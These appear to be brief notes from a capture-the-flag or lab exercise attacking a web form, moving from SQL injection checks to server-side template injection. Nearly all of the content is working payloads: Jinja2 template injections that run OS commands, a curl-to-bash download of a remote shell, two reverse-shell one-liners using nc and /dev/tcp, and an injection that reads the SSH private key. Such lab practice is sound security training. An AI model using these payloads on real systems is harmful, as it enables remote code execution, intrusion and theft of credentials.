Untitled

Untitled

submit email

Untitled

check for sql injection

Untitled

trying things

Untitled

ssti

Untitled

${{request.application.globals.builtins.import("os").popen("curl -s http://10.10.14.2:88/shell | bash").read()}}

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|bash -i 2>&1|nc 10.10.14.2 9999 >/tmp/f

/bin/bash -c 'bash -i >& /dev/tcp/10.10.14.2/7777 0>&1'

error

{{ cycler.init.globals.os.popen('id; cat ~/.ssh/id_rsa').read() }}